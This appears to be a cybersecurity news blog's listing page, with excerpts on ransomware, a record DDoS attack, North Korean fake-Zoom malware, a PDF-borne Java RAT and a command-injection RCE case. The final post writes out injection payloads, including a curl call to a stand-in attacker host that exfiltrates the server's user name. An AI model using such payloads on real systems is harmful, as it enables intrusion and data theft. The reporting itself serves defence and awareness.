Search This Blog
Powered by Blogger.

Blog Archive

Labels

About Me

Load More
Trendy Right Now

Popular Posts

Showing posts with label News. Show all posts
Ransomware
Cyber Attacks Cybersecurity Hypervisor News Ransomware

Hypervisor Ransomware Threat Grows: MITRE ATT&CK v17 Puts C-Suite on Alert

 

The latest update to the MITRE ATT&CK framework—version 17—has brought hypervisor security into sharp focus, prompting a necessary shift in how organizations view the core of their virtualized infrastructure. For the first time, VMware ESXi hypervisors have received a dedicated matrix within the widely adopted framework, underscoring their growing vulnerability to targeted cyberattacks. This move serves as a wake-up call for executive leadership: hypervisor security is no longer just a technical concern, but a strategic imperative. 

As enterprises increasingly rely on virtual machines to run mission-critical workloads and store sensitive data, any compromise at the hypervisor level can have devastating consequences. A single attack could trigger operational downtime, lead to failed audits, and expose the organization to compliance violations and regulatory scrutiny. Experts warn that unaddressed ESXi vulnerabilities may even be classified as preventable lapses in due diligence. 

Compounding the issue is the fact that many organizations still lack defined incident response playbooks tailored to hypervisor attacks. With MITRE ATT&CK now mapping tactics used to breach, move laterally, and deploy ransomware within hypervisors, the risks are no longer theoretical—they are measurable and real. 

To mitigate them, leadership must champion a security strategy that includes robust access controls such as multi-factor authentication, role-based permissions, lockdown policies, and virtual patching to cover unpatched or zero-day vulnerabilities. Additionally, organizations are urged to deploy runtime monitoring and align defences with the MITRE ATT&CK framework to improve security posture and audit readiness. Failing to address this blind spot could cost companies more than just operational delays—it could lead to loss of customer trust and reputational damage. 

As threat actors grow more sophisticated, overlooking the hypervisor layer is no longer an acceptable risk. The inclusion of ESXi in ATT&CK v17 represents a broader industry recognition that hypervisors must be part of the core cybersecurity conversation. For the C-suite, this means embracing their role in driving hypervisor resilience across security, infrastructure, and governance functions before an attack makes that decision for them.
Read more »
trending cybersecurity news
Data Breach Data Leakage Data Theft News Ransomware trending cybersecurity news

Chaos Ransomware Strikes Optima Tax Relief, Leaks 69GB of Sensitive Customer Data

 

In a significant cybersecurity incident impacting the financial services sector, U.S.-based tax resolution firm Optima Tax Relief has reportedly suffered a ransomware attack orchestrated by the Chaos ransomware group. The attackers have allegedly exfiltrated and leaked approximately 69GB of data, including confidential corporate records and sensitive personal tax files.

The exposed information reportedly includes Social Security numbers, home addresses, phone contacts, and banking details — all highly valuable to identity fraudsters. Given the nature of tax records, cybersecurity experts caution that the risks for affected individuals could extend for years, as this type of data cannot simply be changed like passwords.

Chaos Group Increases Aggression 

The ransomware group behind the attack, known as Chaos, has been active since March 2025 and is rapidly gaining notoriety for targeting organisations with vast stores of personally identifiable information (PII). Unlike the earlier Chaos ransomware builder seen in 2021, this iteration appears to be a more organised threat actor, employing a strategic approach in selecting its victims. This isn’t their first major claim. In May, Chaos asserted responsibility for a breach involving The Salvation Army, though that incident has yet to be independently verified. 

Silence from Optima Raises Questions 

Optima Tax Relief has yet to release a public statement or acknowledge the breach, prompting concerns among cybersecurity professionals and affected customers. It is still unclear whether the company has reported the incident to federal authorities or regulators. The lack of transparency is drawing criticism over potential lapses in consumer notification, data handling, and compliance with data protection regulations. 

Recommendations for Affected Individuals For anyone who has previously engaged Optima's services, cybersecurity analysts recommend treating their personal information as compromised. Immediate protective steps include: 

1. Enrolling in identity theft protection services that offer credit and SSN monitoring 

2. Reviewing bank statements and credit card activity for suspicious transactions 

3. Requesting credit freezes or fraud alerts from financial institutions 

4. Using data removal tools to reduce digital exposure Installing reputable antivirus software to fend off phishing or malware threats 

5. Enabling two-factor authentication on all financial and sensitive accounts 

A Warning for the Financial Sector 

This breach is part of a growing pattern in which ransomware groups are aggressively targeting organisations that store large volumes of sensitive consumer data — particularly in tax, legal, and healthcare sectors. Experts point out that financial firms, especially those involved in tax resolution, remain prime targets due to their often under-resourced cybersecurity infrastructure.

As investigations continue, pressure is mounting on Optima Tax Relief to disclose the extent of the damage and take accountability for customer safety moving forward.
Read more »
News
CloudFlare Cyber Security Cybersecurity DDOS Attack News

Cloudflare Thwarts Record-Breaking DDoS Attack as Global Threat Escalates

 

Cloudflare has successfully blocked the largest distributed denial-of-service (DDoS) attack ever recorded, marking a significant moment in the escalating battle against cyber threats. The attack peaked at an unprecedented 7.3 terabits per second (Tbps), targeting an unnamed hosting provider and unleashing 37.4 terabytes of data in just 45 seconds. Cloudflare’s Magic Transit service absorbed the blow, which was composed almost entirely—99.996%—of User Datagram Protocol (UDP) flood attacks. 

While UDP is commonly used for real-time applications like streaming and gaming due to its speed, that same characteristic makes it vulnerable to exploitation in high-volume cyberattacks. The remaining 0.004% of the traffic—about 1.3 GBps—included various amplification and reflection attack methods such as NTP reflection, Echo reflection, Mirai UDP flood, and RIPv1 amplification. This sliver alone would be enough to cripple most unprotected systems. 

What set this attack apart wasn’t just volume but velocity—it carpet-bombed an average of 21,925 destination ports per second, with peaks reaching 34,517 ports on a single IP address. The attack originated from over 122,000 unique IP addresses spanning 161 countries, with the most significant traffic coming from Brazil, Vietnam, Taiwan, China, Indonesia, and Ukraine. This historic attack is part of a growing wave of DDoS incidents. In the first quarter of 2025 alone, Cloudflare mitigated 20.5 million DDoS attacks—a staggering 358% increase from the same period last year. Nearly 700 of these were hyper-volumetric attacks, averaging eight per day and overwhelmingly leveraging network-layer vulnerabilities via UDP floods. 

Earlier this year, Cloudflare had also defended against a 6.5 Tbps strike linked to the Eleven11bot botnet, composed of tens of thousands of compromised webcams and IoT devices. The rise in DDoS activity is not just a technical issue—it’s being fueled by geopolitical tensions as well. According to Radware’s director of threat intelligence, Pascal Geenens, hacktivist DDoS attacks against U.S. targets surged by 800% in just two days in June, following U.S. involvement in the Israel-Iran conflict. Radware’s 2025 Global Threat Analysis Report highlights a 550% global increase in web-based DDoS attacks and a near 400% year-over-year growth in overall DDoS traffic volume. Experts warn that these attacks are only going to become more frequent and intense. To counter this threat, experts recommend a multi-layered defense strategy. 

Partnering with specialized DDoS mitigation providers such as Cloudflare, Akamai, Imperva, or Radware is essential for organizations that lack the infrastructure to defend against large-scale attacks. Blocking traffic from known malicious Autonomous System Numbers (ASNs) and using geoblocking can filter out harmful sources, although attackers often bypass these measures with spoofed IPs or botnets. Distributing network infrastructure can prevent single points of failure, while configuring routers and firewalls to block unsafe protocols like ICMP and FTP adds an additional line of defense. Businesses are also advised to work closely with their internet service providers to filter unnecessary traffic upstream. 

Deploying Web Application Firewalls (WAFs) is critical for defending against application-layer threats, and using multiple DNS providers with DNSSEC can ensure site availability even during attacks. Specialized tools like Wordfence for WordPress add another layer of protection for widely used platforms. Importantly, no single solution is sufficient. Organizations must adopt layered defenses and routinely test their systems through red team exercises using tools like HULK, hping3, or GoldenEye to identify vulnerabilities before attackers exploit them. Even small websites are no longer safe from DDoS campaigns. As cybersecurity journalist Steven Vaughan-Nichols noted, his personal site faces about a dozen DDoS attacks every week. In today's threat landscape, robust DDoS defense isn't a luxury—it’s a necessity.
Read more »
North Korea cyberattacks
cyberattacks trending news malware Malware attacks News North Korea North Korea Hackers North Korea cyberattacks

North Korean Hackers Target Fintech and Gaming Firms with Fake Zoom Apps

 

A newly uncovered cyber campaign is targeting organizations across North America, Europe, and the Asia-Pacific by exploiting fake Zoom applications. Cybersecurity experts have traced the operation to BlueNoroff, a notorious North Korean state-backed hacking group affiliated with the Lazarus Group. The campaign’s primary focus is on the gaming, entertainment, and fintech sectors, aiming to infiltrate systems and steal cryptocurrency and other sensitive financial data. 

Attack strategy 

The attack begins with a seemingly innocuous AppleScript disguised as a routine maintenance operation for Zoom’s software development kit (SDK). However, hidden within the script—buried beneath roughly 10,000 blank lines—are malicious commands that quietly download malware from a counterfeit domain, zoom-tech[.]us. 

Once the malware is downloaded, it integrates itself into the system through LaunchDaemon, granting it persistent and privileged access at every system startup. This allows the malware to operate covertly without raising immediate alarms. The malicious software doesn’t stop there. It fetches additional payloads from compromised infrastructure, presenting them as legitimate macOS components like “icloud_helper” and “Wi-Fi Updater.” 

These files are designed with anti-forensics techniques to erase temporary files and conceal their activity, all while maintaining a hidden backdoor for remote control and data exfiltration. This deceptive approach is particularly dangerous in remote work environments, where minor software issues are often resolved without deep inspection—making it easier for such malware to slip past unnoticed. 

Motives behind the attack

BlueNoroff’s intent appears financially driven. The malware specifically searches for cryptocurrency wallet extensions, browser-stored login credentials, and authentication keys. In one known incident dated May 28, a Canadian online gambling platform fell victim to this scheme after its systems were compromised via a fraudulent Zoom troubleshooting script. 

Protection Measures for Organizations Given the growing sophistication of such campaigns, security experts recommend several protective steps: 

• Independently verify Zoom participants to ensure authenticity. 

• Block suspicious domains like zoom-tech[.]us at the firewall level. 

• Deploy comprehensive endpoint protection that can detect hidden scripts and unauthorized daemons. 

• Invest in reliable antivirus and ransomware protection, especially for firms with cryptocurrency exposure. 

• Use identity theft monitoring services to detect compromised credentials early. 

• Train employees to recognize and respond to social engineering attempts. 

• Secure digital assets with hardware wallets instead of relying on software-based solutions alone.
Read more »
trending news
Artificial Intelligence Cerebras News Technology trending news

Cerebras Unveils World’s Fastest AI Chip, Beating Nvidia in Inference Speed

 

In a move that could redefine AI infrastructure, Cerebras Systems showcased its record-breaking Wafer Scale Engine (WSE) chip at Web Summit Vancouver, claiming it now holds the title of the world’s fastest AI inference engine. 

Roughly the size of a dinner plate, the latest WSE chip spans 8.5 inches (22 cm) per side and packs an astonishing 4 trillion transistors — a monumental leap from traditional processors like Intel’s Core i9 (33.5 billion transistors) or Apple’s M2 Max (67 billion). 

The result? A groundbreaking 2,500 tokens per second on Meta’s Llama 4 model, nearly 2.5 times faster than Nvidia’s recently announced benchmark of 1,000 tokens per second. “Inference is where speed matters the most,” said Naor Penso, Chief Information Security Officer at Cerebras. “Last week Nvidia hit 1,000 tokens per second — which is impressive — but today, we’ve surpassed that with 2,500 tokens per second.” 

Inference refers to how AI processes information to generate outputs like text, images, or decisions. Tokens, which can be words or characters, represent the basic units AI uses to interpret and respond. As AI agents take on more complex, multi-step tasks, inference speed becomes increasingly essential. “Agents need to break large tasks into dozens of sub-tasks and communicate between them quickly,” Penso explained. “Slow inference disrupts that entire flow.” 

What sets Cerebras apart isn’t just transistor count — it’s the chip’s design. Unlike Nvidia GPUs that require off-chip memory access, WSE integrates 44GB of high-speed RAM directly on-chip, ensuring ultra-fast data access and reduced latency. Independent benchmarks back Cerebras’ claims. 

Artificial Analysis, a third-party testing agency, confirmed the WSE achieved 2,522 tokens per second on Llama 4, outperforming Nvidia’s new Blackwell GPU (1,038 tokens/sec). “Cerebras is the only inference solution that currently outpaces Blackwell for Meta’s flagship model,” said Artificial Analysis CEO Micah Hill-Smith. 

While CPUs and GPUs have driven AI advancements for decades, Cerebras’ WSE represents a shift toward a new compute paradigm. “This isn’t x86 or ARM, It’s a new architecture designed to supercharge AI workloads,” said Julie Shin, Chief Marketing Officer at Cerebras.
Read more »
PDF malware
cyberattacks trending news malware News PDF malware

Multiplatform Malware Campaign Uses PDF Invoices to Deploy Java-Based RAT

 

A new wave of cyberattacks is sweeping across digital infrastructures globally, leveraging weaponised PDF invoices to infiltrate systems with a sophisticated Java-based Remote Access Trojan (RAT). Security researchers from Fortinet have identified a multi-stage, evasive malware campaign targeting Windows, Linux, and macOS devices, exploiting the cross-platform capabilities of Java to establish remote control over compromised machines. 

The attack chain begins with phishing emails that appear to contain legitimate invoice attachments. These emails pass domain authentication checks—such as SPF validation—by misusing the serviciodecorreo.es mail service, which is permitted to send messages on behalf of numerous domains. The attached PDF lures recipients with urgent invoice-related messaging, prompting them to click embedded buttons that lead to the next stage of infection. 

Once a user interacts with the PDF, they are redirected to a Dropbox-hosted HTML file titled “Fattura”—the Italian word for “invoice.” This file prompts a basic CAPTCHA check before further redirecting the victim to a URL generated by Ngrok, a legitimate tunneling service often abused to conceal malicious activity. 

What makes this campaign particularly difficult to detect is its use of geolocation filtering. Depending on the user’s IP address, the final content differs: users located in Italy receive a Java Archive (JAR) file camouflaged under generic filenames such as “FA-43-03-2025.jar,” while users from other regions are shown an innocuous Google Drive document containing a non-malicious invoice from an entity named Medinova Health Group. This strategy effectively thwarts email security platforms that scan links from centralised cloud environments, which often lack region-specific browsing behaviour. 

If the user downloads and runs the JAR file, a Java-based Remote Access Trojan known as RATty is deployed. This malware allows attackers to execute remote commands, log keystrokes, capture screenshots, access files, and even control webcams and microphones. By exploiting the Java Runtime Environment (JRE), the RAT functions across operating systems, significantly broadening its potential victim base. To further evade detection, the campaign uses trusted platforms like Dropbox and MediaFire to host malicious components. Additionally, Ngrok’s dynamic tunneling service helps the attackers disguise their infrastructure, making attribution and blocking more difficult. 

The attackers have also conducted reconnaissance to identify vulnerable domains, optimising their strategy for maximum penetration and persistence. Security experts warn that the use of such multilayered and cross-platform infection techniques reflects the growing sophistication of threat actors. The campaign not only highlights the critical need for advanced threat detection systems but also reinforces the importance of user awareness, particularly around email-based social engineering tactics. 

Organisations are urged to ensure their endpoint protection tools are updated and to consider restricting the execution of Java applications from unknown sources. Furthermore, robust geofencing-aware email filtering and sandboxing solutions could help in flagging such targeted, region-specific attacks before they escalate.
Read more »
trending news
Cyber Security News Trending trending news

“They're Just People—But Dangerous Ones”: Trellix's John Fokker Unpacks the Blurred Battlefield of Cybercrime at RSA 2025

 

At the RSA Conference 2025, John Fokker, head of threat intelligence at the Trellix Advanced Research Center, issued a stark reminder to the cybersecurity community that the behind of every cyberattack is a human being and the boundaries between criminals and nation-states are rapidly dissolving. Drawing from his experience as a former officer in the Dutch high-tech crime unit, Fokker urged cybersecurity professionals to stop viewing threats as faceless or purely technical. “Cybercriminals are not abstract concepts,” he said. “They’re individuals—ordinary people who happen to be doing bad things behind a keyboard.” 

His keynote speech stressed the importance of not overlooking basic vulnerabilities in the rush to guard against sophisticated attacks. “Attackers still go for the low-hanging fruit—weak passwords, missing patches, and lack of multi-factor authentication,” he noted. A central theme of his address was the convergence of criminal networks and state-backed operations. “What once were clearly separated entities—financially motivated hackers and state actors...are now intertwined,” Fokker said. “Nation-states are increasingly using proxies or outright criminals to carry out espionage and disruption campaigns.” Fokker illustrated this through a case study involving the notorious Black Basta ransomware group. 

He referenced internal communications that surfaced in an investigation, revealing the group’s leader “Oleg" formerly known as “Tramp” in the Conti gang. Oleg was reportedly arrested upon arriving in Armenia from Moscow last year, but escaped custody just days later. According to leaked chats, he claimed Russian officials orchestrated his return using a so-called “green corridor,” allegedly coordinated by a senior government figure referred to as “number one.” While Fokker clarified that these claims remain unverified, he emphasized they are a troubling sign of potential collaboration between state entities and criminal gangs. 

Still, he reminded attendees that attackers are not infallible. He recounted a failed ransomware attack by Black Basta on a U.S. healthcare organization, where the group’s encryption tool malfunctioned. “They had to fall back on threatening to leak data when the original extortion method broke down,” Fokker explained, highlighting that even seasoned attackers are prone to critical errors.
Read more »
trending news
Cyber Security News trending news

Security Researcher Uncovers Critical RCE Flaw in API Due to Incomplete Input Validation

In a recent security evaluation, a researcher discovered a severe remote code execution (RCE) vulnerability caused by improper backend input validation and misplaced reliance on frontend filters. The vulnerability centered on a username field within a target web application. 

On the surface, this field appeared to be protected by a regular expression filter—/^[a-zA-Z0-9]{1,20}$/—which was designed to accept only alphanumeric usernames up to 20 characters long. However, this filtering was enforced exclusively on the frontend via JavaScript. While this setup may prevent casual misuse through the user interface, it offered no protection once the client-side constraints were bypassed. 

The server did not replicate or enforce these restrictions, creating an opportunity for attackers to supply crafted payloads directly to the backend. Client-Side Regex: A False Sense of Security The researcher quickly identified a dangerous assumption built into the application’s architecture: that client-side validation would be sufficient to sanitize input. This approach led the backend to trust incoming data without question. 

By circumventing the web interface and manually crafting HTTP requests, the researcher was able to supply malicious input that would have been blocked by the frontend regex. This demonstrated a critical weakness in security design. The researcher noted that regular expressions should be viewed as tools to assist in user input formatting, not as security mechanisms. 

When frontend validation is treated as a safeguard rather than a convenience, it opens the door to serious vulnerabilities. Bypassing Protections via Alternate HTTP Methods The most significant discovery came when the researcher explored alternate HTTP methods. While the application interface relied on POST requests—where regex filters were enforced—the backend also accepted PUT requests at the same endpoint. These PUT requests were not subjected to any validation, creating a dangerous inconsistency. 

Using a crafted PUT request with the payload username=;id;, the researcher confirmed the ability to inject and execute arbitrary commands. The server’s response to the id command verified the successful exploitation of this oversight. Further probing revealed the potential for more advanced attacks, including out-of-band (OOB) data exfiltration. 

By submitting a payload like username=;curl http://attacker-controlled.com/$(whoami);, the researcher caused the server to initiate a connection to an external domain. This revealed the active user account running on the server, proving that the command had been executed remotely. The absence of a web application firewall (WAF) allowed this traffic to pass unnoticed, making the attack both silent and effective.  
Architectural Oversight and Security Best Practices This case highlighted a widespread architectural flaw: the fragmentation of security logic between frontend and backend layers. Developers frequently assume that if an input field is restricted on the client side, it is secure—overlooking the need to apply the same or stricter rules on the server. This disconnect is what enabled the exploit. 

The API processed data without verifying whether it adhered to expected formats, and alternative HTTP methods were insufficiently monitored or restricted. To address such risks, experts stress the importance of server-side validation as the primary line of defense. Every piece of input data should be rigorously checked against an allowlist of acceptable values before processing. 

Additionally, output should be sanitized to ensure that even if unsafe input slips through, it cannot be used maliciously. Logging and monitoring are also critical, especially for API endpoints that might be vulnerable to tampering. The deployment of a robust WAF could have detected and blocked these unusual request patterns, such as command injection or OOB callbacks, thereby mitigating the threat before damage occurred.
Read more »
Subscribe to: Posts (Atom)